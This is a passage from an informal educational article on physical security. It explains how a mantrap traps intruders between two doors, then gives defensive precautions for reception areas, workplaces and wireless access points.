This is a good trick to trap an attacker.In this a room is secured by two doors. Which means
that person need to pass through 2 doors to get into the room. There is quite space between these two doors. Moreover if can't keep both doors open in same time. A door will only open if other door is closed.
Now the first door don't need any authentication from outside, so anyone can enter but the second door needs the authentication to open and to enter the room. The first door needs authentication from inside.
So here is how this trick work. Let an attacker enters a company in spy manner. Now he/she reaches the mantrap. Attacker will not be aware about mantrap. So attacker open the first door and enter as it will not require any authentication. Now attacker closes the first door. Now when attacker tries to open second door it will ask for authentication, now if attacker don't have authentication then he/she can't open second door. Moreover first door will also require authentication from inside to open .
As attacker don't have authentication he/she gets trapped in between both the doors. Later he/she can be caught by the employers and can be inquired.

3. Reception :
This is usually the place where people sit and wait for someone. It must be secured to avoid any attacker to enter internal places. The activities of people in reception area must be watched and recorded by CCTV. etc.People sitting in reception area must be questioned about there presence. The computer of receptionist must be well secured and screen must not face towards the crowd.
Moreover no important documents must be lying on reception area. This can be used by attacker for social engineering.
The sitting arrangement of visitors must be at safe distance so that they don't overhear any important conversations.

4. Workplace :
This is area where the employers work. Employer of one department must not be allowed to pass information to other department unless it is regarding project/work. Employers must lock their unattented screen before leaving.
This is main step because it can avoid the attacker to have physical access to system. Employers must be provided badges to identify them. If any person is wandering in company without badge he/she can be questioned about it. Visitors must be provided visitor badge. Employers must not write any useful information on small paper and stick it on desktop, keyboard or walls. It is seen that many employers write their password on small bit of paper and hide it somewhere like under keyboard etc. This type of thing must be avoided. Usually it is seen that many companies label their machines with the name according to their fucntions. Like mail servers has a label of paper on which it is written mail server. This must be avoided because attacker can easily know the location of your particular machines.
Wireless access points must be also secured in order to avoid unauthorized access to corporate network. Use WPA instead if WEP, use techniques like MAC filtering all this can make breaking into WiFi complicated for attacker.

So these were some precautions that can be taken to implement physical security in an infrastructure.